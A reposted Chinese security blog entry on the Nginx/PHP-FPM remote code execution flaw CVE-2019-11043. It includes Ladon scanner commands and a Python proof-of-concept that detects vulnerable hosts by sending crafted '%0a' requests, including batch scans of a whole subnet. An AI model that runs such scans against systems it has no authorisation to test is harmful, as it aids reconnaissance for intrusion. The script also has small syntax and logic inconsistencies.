欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

Ngnix PHP-FPM 远程代码执行漏洞复现(CVE-2019-11043)

程序员文章站 2022-07-15 12:06:47
...

漏洞简介

PHP-FPM 远程代码执行漏洞(CVE-2019-11043)

在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。

在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。

Example

和Ladon.exe放在同一目录,即可对C段或url.txt进行批量检测

Ladon CVE-2019-11043_Poc.ini 批量URL检测(根目录下放url.txt)
Ladon 192.168.1.37/24 CVE-2019-11043_Poc.ini 批量检测C段主机是否存在该漏洞
Ladon http://192.168.1.37:8080/index.php CVE-2019-11043_Poc.ini 指定URL
Ladon 5.5
By K8gege
Call AnyExe/Command
http://192.168.1.37:8080/index.php
load F:\Python279\python.exe
ISVUL: CVE-2019-11043 http://192.168.1.37:8080/index.php

Ngnix PHP-FPM 远程代码执行漏洞复现(CVE-2019-11043)

import requests
import sys
# Ladon POC by k8gege
# VUL: CVE-2019-11043 (PHP-FPM + Ngnix)
# url need include .php Example:http://192.168.1.37:8080/index.php

# CVE-2019-11043_POC.ini
# [Ladon]
# exe=F:\Python279\python.exe
# arg=POC\CVE-2019-11043-POC.py $ip$

# Example
# Ladon 192.168.1.37/24 poc/CVE-2019-11043_Poc.ini
# Ladon http://192.168.1.37:8080/index.php poc/CVE-2019-11043_Poc.ini

# Result
# Ladon 5.5
# Call AnyExe/Command
# http://192.168.1.37:8080/index.php
# load F:\Python279\python.exe
# ISVUL: CVE-2019-11043 http://192.168.1.37:8080/index.php

def checkpoc(url):
	try:
		headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0"}
		res1 = requests.get(url, headers=headers)
		if res1.status_code == 200:
			print "URL: "+url
			for i in range(1499, 1900):
				res = requests.get(url + "/PHP%0Ais_poc_thistiest_lang.php?" + "K" * i, headers=headers)
				if res.status_code == 502:
					print("ISVUL: CVE-2019-11043 "+url)
					break
	except:
	  pass

url = sys.argv[1]
if "http" in url:
	checkpoc(url)
else:
	checkpoc("http://"+url+"/index.php")
	checkpoc("http://"+url+":8080/index.php")
checkpoc("https://"+url+"/index.php")

下载

Poc: https://github.com/k8gege/CVE-2019-11043
Ladon: https://github.com/k8gege/Ladon